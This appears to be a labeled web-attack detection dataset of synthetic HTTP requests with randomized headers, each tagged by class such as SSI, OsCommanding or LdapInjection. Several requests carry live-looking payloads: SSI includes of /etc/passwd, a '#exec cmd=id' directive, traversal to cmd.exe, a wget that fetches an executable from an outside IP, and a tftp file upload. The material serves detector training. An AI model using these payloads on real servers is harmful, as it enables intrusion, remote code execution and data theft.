Proxy-Authorization: Digest uri=/ygess/rPo2ct/Manhrsn/oyiihes/ger1eh.exe
Authorization: Basic Ym8zRHhlTjp0VURo
Range: 5-,07-2
Referer: http://ihjeEwy.de/we1roe/ie0drsh.jpg
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: qrpircnmZv8o4aeI
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/8.6 215.163.107.69, 9.1 www.m4abG.shtml, 4ozf/9.8 62.151.149.157
Transfer-Encoding: gzip
Upgrade: seEc/8.9, 7elors/6.3, 4uhv/9.8, I5eg5m/5.5
Warning: 966 120.240.162.4:31750 "00mbdoaEom" 
X-Forwarded-For: 177.74.168.130
X-Serial-Number: 576547919315
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46288
Start - Id: 39659
class: SSI
GET /iNA1/@Gpv2JXH5T_.gif?vu_xntjm=67&9gtnnhrustie4e=%3C%21--++++%23include+virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E HTTP/1.1
Host: 223.160.157.37:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 48.57.34.71
Cookie: xopetx4ileralwv=jeEoaaracih;nodu=636
Cookie2: $Version="9"
Date: Wed, 17 Mar 10 05:19:07 GMT
ETag: W/"DjzoEKQNI9ad3TMI8QLe"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Fri, 17 Jun 05 23:52:26 UTC
If-Unmodified-Since: Fri, 30 Jul 04 02:27:40 UTC
If-Match: "B@3VoxY.xDKOy5mo"
If-None-Match: *
If-Range: Tue, 23 Sep 08 05:26:30 CET
Max-Forwards: 75
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Basic YW5pb2J0Qzc6c01vZWNp
Range: -7190
Referer: http://8esr.org/eorea3a/tlh0te/w3ysyh.tar
TE: chunked;q=0.6,trailers,trailers
Trailer: Date
User-Agent: hEd16odred2
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8969x195
Via: FTP/3.9 45.117.3.147:0817, 2.3 43.75.210.7
Transfer-Encoding: gzip
Upgrade: iw6k/3.2, ans3Du/7.4, m5dr/5.3
Warning: 273 www.Sneje.htm "srzSNAitebchch" "Mon, 20 Dec 04 23:29:19 UTC"
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39659
Start - Id: 44389
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 130.57.30.12
Connection: eaot
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.7, identity;q=0.7, deflate, compress, compress;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 25.151.126.170
Cookie: Levali3Azc07p=hxKyH;e7mtzdemeWthe=eXH5r;tleshh=dlTwhl;odstt6e=ruea;hBCq=nqrdEvf?psa6sw;aglsOseRtoe43=eWUe
Cookie2: $Version="962"
Date: Fri, 03 Jun 05 16:57:40 GMT
ETag: W/"obTbaYx6BR7gH4UQQTN9"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Fri, 07 Sep 07 11:36:25 UTC
If-Unmodified-Since: Sat, 14 Oct 06 12:43:03 GMT
If-Match: *
If-None-Match: "7Geed9WwR@oSU9rQGr60"
If-Range: Sat, 17 Apr 10 24:21:18 CET
Max-Forwards: 011
MIME-Version: 6.9
Pragma: T='idt'
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: sn0ye coore=oA6t
Range: -843519
Referer: /dox9en6/hths/o9fobic/reefe/dysgr.tar.gz
TE: chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: 02aEgR (nOHXitR4YP; grbppDl5i.; nib4bGAF2)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8335x3340
Via: 1.6 www.tTimtswn.tiff, HTTP/5.2 84.182.166.38
Transfer-Encoding: identity
Upgrade: sltIe/4.5, 7smi/8.6, fir/0.7
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44389
Start - Id: 48720
class: XPathInjection
GET /bFaFh_sS.JFRVm@J/a.qb0Mf/mo4jAl4ELEhHVLKw/8eShyOecdotsAanee/tYw2bS-ER0.SlZ/ipyEc9naiQelU.shtml?aeTlak=5922+or+++e%2FqN%2Fw%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D9%5D++++or+++++72451%3D&acthv=77&lh=%26Lrxcnedf%3B+vbscriptl%7Ec%3AEd&Amnv=teoaZinodeTN&mrWj42wn8naam1=8&Mea=h9gzmxCbi HTTP/1.0
Host: 241.129.19.49:83386
Connection: keep-alive
Accept: text/*, application/zip, text/plain
Accept-Charset: isiri-3342, iso-8859-1, iso-8859-15;q=0.2
Accept-Encoding: gzip;q=0.4, deflate;q=0.3
Accept-Language: *;q=0.2
Cache-Control: max-stale=96732
Client-ip: 86.22.3.99
Cookie: dPwos9orVet=hlrconnect;QKa=]aoi;laTaoaxENE=54;Oto=zaenosno65e96;eagthroh9n= ttetr\9itdetcyny;hAoryetrewvrn=00607839
Cookie2: $Version="651"
Date: Thu, 12 Jun 08 18:57:55 UTC
Expect: 100-continue
From: raanojj@nQhsOlcaae.ch
If-Modified-Since: Fri, 06 Aug 04 23:15:33 CET
If-Unmodified-Since: Wed, 13 Jan 10 10:06:06 UTC
If-Match: "3VPG4W1@UZ_oAAAC"
If-None-Match: *
If-Range: Fri, 06 Feb 04 19:27:57 UTC
Max-Forwards: 21
Pragma: a2sw='soaurw'
Proxy-Authorization: Basic d3huRXUyaTp0cWFtYw==
Authorization: Digest response="2d061edCDdeBC6976Ae414Fbd85c3Ef0"
Range: 10010-
Referer: /ohm9toi.aspx
Trailer: Transfer-Encoding
User-Agent: 1yeieozs/0.1.9.1
UA-CPU: MIPS
Via: 9.7 47.34.17.177:475, FTP/1.4 www.2elho.shtml
Transfer-Encoding: identity
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
Warning: 042 95.15.3.29 "ettnnbeaTz7i" "Fri, 29 Apr 05 11:16:46 UTC"
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48720
Start - Id: 43024
class: OsCommanding
PUT /LlsK0RS6-/yxe4tieloektu/6e5T-/6uaoSinukqt/HFkmwgetCSPbOa/zmhnR.jpg? HTTP/1.1
Content-Length: 175
Content-Language: uahigeii,rtdjl
Content-Encoding: gzip
Content-Location: http://www.stTe7.gov/tEwsi/ei3caa/uetAeoa.mpeg
Content-MD5: b3lyYWVhZWVhcWVnSFRpbg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 13:06:45 CET
Last-Modified: Sun, 25 Jun 06 17:22:31 GMT
Host: 98.243.233.243
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 89.141.82.219
Cookie: dmngynsAyaa=mre;nuwr=37rakrtiarfqkc:A;ewoedtretblOG==te;0dBJ2pSENZVk=go;oF1NrZ=htaccesscriptscriptm
Cookie2: $Version="3"
Date: Sun, 08 Apr 07 01:15:30 CET
ETag: "MCaPKcldcM8leI_Vy"
Expect: 100-continue
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Fri, 18 May 07 18:28:56 CET
If-Unmodified-Since: Wed, 14 Apr 10 15:40:43 UTC
If-Match: *
If-None-Match: "WFtCBcW@bkw7hNvx-RAt"
If-Range: "-jqt.BMEeUF_PqoA"
Max-Forwards: 56
Pragma: no-cache
Proxy-Authorization: NTLM eGV0aXNuc29ydXBqdERwdGVpU25vMHNhbGFvYmJiemFrT2NyYWVoZWhk
Authorization: Basic cmlnNzpxaHN1
Range: -98633,070828-,-9277
Referer: http://www.gemftz.org/SonhB0R/nS9i/1denar/a6gtnfr.rar
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: htentonan
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2695x320
Via: 0.3 www.5hN0l.shtml:9, HTTP/8.5 168.223.20.107, 3.1 www.ohwoubri.gif
Transfer-Encoding: woe0sh
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: ------------
~~~~~: ~~~~~~~~~~~~~~

bhicg9=3355721&ietre1nwrnes=e6passthrus&nGSK-yN=eIs&ed0diodoanu=487502087&kK6binedLzf=mail nkiO2@calsimIh.falqb.gov <<   /tmp/wu.c     ;&2ntlEqIdjn=scriptsr'x3eC

End - Id: 43024
Start - Id: 39505
class: SSI
GET /vghinnj.php3? HTTP/1.0
Host: 16.86.60.167
Connection: keep-alive
Accept: audio/*, application/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: <!--   #include virtual="/etc/passwd"-->
Accept-Language: Sfoer-cIoye;q=0.9
Cache-Control: no-transform
Date: Sat, 29 Dec 07 01:31:20 CET
ETag: "jk4o805J3OIxoEW@Bp"
If-Unmodified-Since: Wed, 04 May 05 03:46:26 GMT
If-Match: "oShvP0_S2w2ien2AL"
If-Range: *
Max-Forwards: 091
Authorization: Digest algorithm=MD5
Referer: http://esEw9udp.net/sdaj/qeipsh/two6d.jpeg
User-Agent: oEaotoneEeahqid
UA-Pixels: 8306x0856
Transfer-Encoding: identity
Upgrade: dDl/9.5, nlx/4.9, ahhDz/9.1
Warning: 821 159.211.34.60 "o6ah4obnz4ueuso0mcr" 
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39505
Start - Id: 45338
class: PathTransversal
GET /ikVe1/surntihtphcrmeiieRBo/oJdroprXGW6mUlV/khsm6een0gpobed/scriptIp4Z86-update43zcxT.sh? HTTP/1.0
Host: 32.198.52.162
Connection: close
Accept: text/html;q=0.2, video/*, audio/x-wav
Accept-Charset: x-mac-icelandic;q=0.5, x-mac-chinesetrad
Accept-Encoding: deflate, deflate
Accept-Language: ttGmbv-eRsefefd, et-aeamrnj;q=0.0, dnr-dlh8luv;q=0.3
Cache-Control: no-transform
Client-ip: 166.252.214.129
Cookie: VPcdocumentSk=ul;oleNz8gcficcaac=09383659;f5Cyholomerlhzn=r;scD=../../../../../../WINNT/autoexec.bat
Date: Fri, 18 Feb 05 13:14:37 UTC
Expect: 9oes
From: ttod@msoo.gov
If-Modified-Since: Sun, 14 May 06 05:24:04 CET
If-Unmodified-Since: Sun, 11 Mar 07 12:27:18 CET
If-Match: *
If-None-Match: *
If-Range: "IM4q9wN27F28Ij@x"
Max-Forwards: 02
Pragma: niaI4bca=eza
Proxy-Authorization: Basic Z3dFcmVicWo6aXRHM2FuZGM=
Authorization: NTLM dTFlMmlzN3FhTm1ndHYwdGlpYmVjTjkybzlZbWlzejhpbTV1VnM=
Referer: http://o7aa.fr/9wnemda0/dteeet/kpatgwsa.mpeg
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/5.7 (compatible; MSIE 7.3; Open BSD i586; rghpiK; tt7o)
UA-CPU: 68000
Via: 2.0 www.nURity.shtml, 8.1 www.ydl0.js
Transfer-Encoding: deflate
Warning: 016 www.4ru5.js "o8ttii4udn" "Sun, 07 Aug 05 05:14:03 CET"

null

End - Id: 45338
Start - Id: 37674
class: LdapInjection
POST /1@iYq-qM/IvZuc6F3inputJ/OXRFUxkxmirttdp/abUpE1GqyUmheoW5/6HTfatac5an/hstfilieo6s.js? HTTP/1.1
Content-Length: 318
Content-Language: tsk
Content-Encoding: compress
Content-Location: http://tid67aa.gov/wHx9gvi/oi0sns/arsdn/retoPtl.sh
Content-MD5: ZW5hdHd1d2VZcHJhbW9ucQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Nov 07 08:26:52 UTC
Last-Modified: Tue, 12 Jan 10 18:17:18 UTC
Host: www.0ebtT.uk
Connection: close
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.3, identity, deflate
Accept-Language: stdo-aasel;q=0.5
Cache-Control: one1eQ1=oo01opct
Client-ip: 77.204.246.223
Cookie: noaapzatl0=D;8vnnszafc6 t;X2wTUGS=06798;gaenteu61qNeg=npxe0ziaaNnge
Cookie2: $Version="613"
Date: Mon, 15 Jan 07 20:14:32 UTC
ETag: "L1wKH0qc0h5OgNanY"
Expect: 100-continue
From: ssDeu@yeiMt.st
If-Modified-Since: Sun, 09 Jan 05 05:01:11 CET
If-Unmodified-Since: Sun, 14 Mar 10 12:51:14 GMT
If-Match: "fdP.5sI.R-AUru88"
If-None-Match: *
If-Range: *
Max-Forwards: 87
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest opaque="Lrea"
Range: 6058-6,88-,-245437
Referer: /0Bp6herm/ooipso.fgf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/0.8 (Windows; U; Win98 6.9; bw-nn; rv:4.1.9) Gecko/42149314
UA-CPU: MIPS
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: 2.1 2.34.100.72, HTTP/1.0 206.92.198.88, HTTP/0.9 22.236.122.79
Transfer-Encoding: compress
Upgrade: pemoEi/4.0
Warning: 123 225.46.208.152:9661 "sweilsrzmalesAdlaO" 
X-Forwarded-For: 193.224.2.50
X-Serial-Number: 7386288464563322200
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gdtaYb=ligeyYTedscriptdoDj&juuqoirahD=3iil7tnic+tsystem&sQLcqoOelEa=tumBPCaB-ROa&yo=tdnee&mrnmh7wi=aunooqxo0a6emvnad&4Y=srm=lslo|cDn&an7aaha8sm5a6=onFf&irimssstsah2=85ess&dmnn=88)(&(objectClass=nuh)(|(sn =    3on)(cn=al    J*))&orndxiEllde=a5CuCtizhe&q9ca=02&nhedpco3d=euslryneeamvh

End - Id: 37674
Start - Id: 49071
class: XPathInjection
GET /dsof.jpg?qt3s3Haee=769&oruun2k=83+or+++++1%3C+cTiy%2Fen54te%2Fbgtmoe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D685%5D+or+43190%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&ena=7415 HTTP/1.0
Host: www.teoeo3tobn.org:80
Connection: close
Accept: application/zip
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: rXTv7-htOt, alrnocil-tmnanoed
Cache-Control: max-stale=7507
Client-ip: 172.17.138.252
Cookie: ntoan9stNs=4;fesesz1en=ne-slBvaAt)tc~hbs;7dae5=tu@.@jHHnZEG;rloegftdw=mmi;1nZJahPl2szs=woe|m;iuhktaH=epLnD
Cookie2: $Version="08"
Date: Thu, 13 Jul 06 03:53:38 CET
ETag: "FxFGVkKbgEi3wINjXU0"
Expect: Dtelu
From: oT4sie@pMej.gov
If-Modified-Since: Wed, 25 Feb 04 10:49:38 CET
If-Unmodified-Since: Thu, 04 Jan 07 22:30:31 UTC
If-Match: *
If-None-Match: "n-qE_YToRSrNKuX"
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 2
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: NTLM Y3FhZWFobWFmYW5BaGRlZHRlb3Jhc2xhZTluR2xEdmxkVWNuaEl0ZW92cw==
Authorization: NTLM U2VoMXRydHllZ3J5OHNvbG0wdGlzdGFxamJrb2lvZXNnM2Rzb0Yy
Range: -1977
Referer: /xieco/urTu/mttsdne/pecrO.htm
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: h3ompozruf
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: 3.1 114.189.102.33, 4.8 239.225.127.206, 4.3 78.0.143.62:3721
Transfer-Encoding: elsu; iSexzRsq=nkaToA
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49071
Start - Id: 40181
class: SSI
GET /85WtqJXZ/qo9PyqRnwzoBKmZn6ZK/sanln4estRtrcTia/motmeehxscuNantzecEo/Mjopen/2VOV0/rgtnaj5eLTassstv/s@q-M/oF3wVmn5G60BNHI8Y/pESbzMhbD9BLpbfk_P/50PClm/tN..htm?ivi3ssyctiiuai=w7dl5R&kE.hf=where+objectrm&d3ftlsS=tNNxE6MOby&KzyiBj1gd=rtAlhdOHcu793riaCb&wex8i8ztc4xwt=se+include&TdaltakToreOUtr=%3C%21+%23%3C%21--++++%23exec+cmd%3D%22id%22--%3E&anc=03&ticoeeooa6Tt=zKaP0pz3t6 HTTP/1.1
Host: 50.179.58.55:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-5;q=0.1, windows-1252, x-mac-icelandic;q=0.4, utf-7;q=0.5
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 17.170.14.186
Cookie: DVF6bsamr=saTMlE
Date: Thu, 15 Dec 05 04:41:46 UTC
ETag: "T5bGB@BRBJBkKms96PS-"
Expect: 100-continue
From: woeiond@etiwPn.it
If-Modified-Since: Sun, 15 Mar 09 15:23:15 UTC
If-Unmodified-Since: Sat, 28 Jun 08 21:21:16 CET
If-Match: *
If-None-Match: "E_yQGn3cE93KGQyAV"
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 2656
Proxy-Authorization: i3sd nmHattte=Gnylo
Authorization: Digest nc=ac4Fa0bE
Referer: http://aqtrsst.uk/niof/slta.shtml
TE: gzip;q=0.1
User-Agent: onrmacr1b0Ieytqsi
Transfer-Encoding: compress
Upgrade: ceumin/9.7, tieM2/3.5, dt0Fea/0.8
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40181
Start - Id: 43277
class: OsCommanding
GET /Enec/rn/tZ8ImEMM0CR_9kj0Q/hi2elTuusopsna/rtrorinocidpsut/iJFcX5HAm70kedh@/Ca/ZUktek3B/tkU3.tiff?1X3DSv=reTe7&LTeoOeQlndNos=%5Cn+wget+++++http%3A%2F%2F34.84.3.186%3A24327%2Fnftp.exe HTTP/1.0
Host: 214.50.147.134
Connection: close
Accept: audio/*;q=0.6, application/*, image/*
Accept-Charset: windows-1255;q=0.6
Accept-Encoding: compress, gzip;q=0.1, compress, identity
Accept-Language: ATodePiK-ks, 9t-an9lne;q=0.4
Cache-Control: min-fresh=89
Client-ip: 86.210.157.25
Cookie: 5g2esuzxiYrs=|h;AUsdcaLpe=ndNTAzt52;LhomeZ_Tjt6shutdownY1y=975810;e8p=lqcpgTi
Cookie2: $Version="414"
Date: Thu, 24 Apr 08 13:45:51 CET
ETag: W/"LVrwdZMaY22OzDr"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: fztees@dntsngao.be
If-Modified-Since: Sun, 18 Jul 04 11:02:48 UTC
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Sep 04 03:49:49 GMT
Max-Forwards: 53
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: mtat GoltfEre=elAxoea
Range: 6444-90250,-039,9-0896
Referer: /Hasae/cmrHoj/aa2avez/ueua.swf
TE: trailers,trailers
Trailer: Range
User-Agent: tchiaq (e5is50@; s9dDqRZ)
UA-CPU: PowerPC
UA-Disp: 649,3130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 267x450
Via: FTP/4.2 www.oeu6fbe.js
Transfer-Encoding: compress
Upgrade: siree/9.1, 17aa/1.9
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 9975739043069
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43277
Start - Id: 43947
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.0o4o8nAent.st
Connection: close
Accept: audio/basic;q=0.9, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: 6weiwt-a7ofa, vylnxtey-wdwtx
Cache-Control: no-transform
Client-ip: 203.44.173.36
Cookie: azabauurmo=eltii|;Totkiyoast1nd=8112802;dNm9oooa8n=fHJPeGIX;suourdauNroiT=rmXee>nup
Cookie2: $Version="4"
Date: Mon, 29 Mar 10 05:33:51 GMT
ETag: "SfHgMhYbzXvv1eK93q"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Tue, 04 May 10 02:09:59 UTC
If-Unmodified-Since: Fri, 24 Nov 06 17:25:07 GMT
If-Match: "Ed_MEUpQFIM27pN2sk"
If-None-Match: *
If-Range: "rU0p8lol0k8cG.PieMo"
Max-Forwards: 53
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: NTLM b3htZWxvc25hc2JpdHNleXRxMHRvZXRvaGVzb05vb2Vo
Range: 40927-72
Referer: /fighon/esaoxeee/oxrp/ipasbpzA.pl
TE: deflate
Trailer: Via
User-Agent: krls (shGyKXH; uRmHNqLZ; brti3yCRf; 2Ek6GSm)
UA-CPU: 68000
UA-Disp: 068,6822,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 539x520
Via: FTP/6.5 173.207.86.37:19, 8.1 www.et7on6ie.html, 2.0 254.93.181.148
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43947
Start - Id: 37949
class: LdapInjection
GET /atWbt2Titc/a1OKqjkFqM@S/uzPe2fnompad/pZctAL/dV35XW194t3P/CCTHpw/ar/cbengtidaFued/mPpTUNfShl/cH8/gsre9IzO8enrlqsp/@nt.htm?i4u=%3E&f7rshl1nr5tvcn6=td2b&tr=271&cetbaik=g1Cbonaje2&IArNye2t=y1ii&3hnsouhn=TmcMa%29%28%26%28objectClass++%3D+++CnE*%29 HTTP/1.0
Host: www.UpTrino4w.st
Connection: A81o4ha
Accept: audio/*, text/*;q=0.6, text/*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.4, gzip;q=0.8, gzip;q=0.3, deflate, identity;q=0.4
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 105.100.209.65
Cookie: sexaxC7bt=dA Tc;hOetqew=174164
Cookie2: $Version="2"
Date: Fri, 17 Nov 06 07:21:06 CET
ETag: "aUGFuRHW-zMYOvq2nU"
Expect: 100-continue
From: p2udarel@zentnnsmu.org
If-Modified-Since: Fri, 01 Apr 05 17:43:18 UTC
If-Unmodified-Since: Tue, 30 Dec 08 20:19:26 UTC
If-Match: *
If-None-Match: "50JG9_b25xdD8wTN2U"
If-Range: "Rac18572haXkQj6nt-hB"
Max-Forwards: 824
MIME-Version: 0.6
Pragma: eptnNn=r
Proxy-Authorization: Digest username="toobo"
Authorization: Digest uri=/jrs8/tehhzt/heNhe.bin
Range: 648492-,076146-138301,-5163
Referer: /dzarI9Ji.jpeg
TE: chunked,deflate,gzip;q=0.2
Trailer: If-Range
User-Agent: lonc/0.9.8
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8848x2681
Via: 4.9 125.58.4.176, gfto8/9.7 118.243.94.23
Transfer-Encoding: deflate
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 209 www.aRtos.png "mgfiafudiih" 
X-Forwarded-For: 82.192.128.217
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37949
Start - Id: 46263
class: PathTransversal
GET /xFVSvfTCP0agyb3/hbUn3y/dk8P5bzPrZaZh/n3ln0/oc3urae3easuat6meeym/sqe-YJzc17rDamMpDa.mspx?gZYzQWnode65iBB=2545&i9tplodrR=21408&t61Iu=0&H2tOHcS=%2F%2C%2C%2C%2Fortrm%2Fkean%2Fpasswd&aaeteeOe7lmlN=83359&hopuiiht9g1=bgsoundtii HTTP/1.1
Host: www.nttCyhn.cz:627
Connection: keep-alive
Accept: application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 117.131.231.99
Cookie: fhF3ZTjs=hia
Cookie2: $Version="45"
Date: Thu, 22 Apr 10 14:35:25 GMT
ETag: "VNc9YS_adiG6@ph7"
Expect: 5hrhmAa=eezafs
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sat, 18 Jul 09 09:43:05 CET
If-Unmodified-Since: Sat, 12 Feb 05 22:45:52 CET
If-Match: *
If-None-Match: "rE1Uw2SCuKqCi7o"
If-Range: *
Max-Forwards: 2
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: cibEh 2hct8=naasvou
Range: 723-2
Referer: /2dzvhlo/ShmeH.pl
TE: gzip,trailers,deflate
Trailer: If-Modified-Since
User-Agent: e0iylhhh/2.9.5.9.8
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: 9.4 www.Iqtes.jpg:12
Transfer-Encoding: gzip
Upgrade: roeie/1.4
Warning: 196 158.163.201.157 "scotgrnti" "Tue, 25 Mar 08 07:11:27 GMT"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46263
Start - Id: 44619
class: OsCommanding
GET /dADkGWks-nKs0k.Ii4m/og8b-wLlPa/mDGSkxCDPHD5/X8450_.mspx?lrsl1pioO=nmhco4n%7CwspclsgtkAD&ioseiaUwu9z=155.72.58.99%7Ctftp++-i++231.118.87.72+++++PUT+sam._&erlOi5unrtteo2E=1518&MA40w8B.PMv=eeaniebncsd0None&rtae4hiat7suei=eh2tw%2BhsS%3Fqz&uhntaon7=tA+ribnptgpl0dveyo HTTP/1.0
Host: www.abehrrijbm.gov
Connection: close
Accept: video/*;q=0.4, application/rtf, image/jpeg
Accept-Charset: *
Accept-Encoding: deflate, deflate, deflate, gzip;q=0.1, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 246.194.239.203
Cookie2: $Version="361"
Date: Fri, 15 Jul 05 03:37:10 UTC
ETag: W/"gkaNyei91XNxgaZu"
From: ad237uo@EsXlle.it
If-None-Match: *
Pragma: no-cache
Authorization: Basic OXM2eW5yOnVKbXQ1bkly
Referer: http://www.hlita.st/ypqpmrir/soEo25uW/msv0Lr/ieiLeSee.jpg
User-Agent: thu4elyinntaae
Via: 8.0 50.36.104.92:4926, 5.2 219.188.37.207
Warning: 713 www.5hi1.png:3491 "euraaru3tewoaaaheo" "Mon, 03 May 10 06:40:58 UTC"

null

End - Id: 44619
Start - Id: 43851
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: www.ownti.fr
Connection: close
Accept: audio/*;q=0.6, audio/*, video/*;q=0.1
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: erf6a-eiuhi8;q=0.7, Ka7erWe-tNfwued, e5e-nthfetee
Cache-Control: max-age=597
Client-ip: 9.232.251.46
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="07"
Date: Thu, 10 Dec 09 06:54:31 UTC
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 16 May 05 22:17:20 GMT
If-Unmodified-Since: Sun, 04 Jul 04 24:36:37 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: Basic b2VUdXNldDpyMzVzOXM=
Range: 064373-124259,214-265,801-679
Referer: http://www.kseu.biz/nset7s/to8cy/qtcn1Awi/gdevyan.mp3
TE: chunked;q=0.4
Trailer: User-Agent
User-Agent: rTd6yE9iqi/8.4.1.6
UA-CPU: PowerPC
UA-Disp: 5599,048,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: 1.6 www.niou.png:6
Transfer-Encoding: compress
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
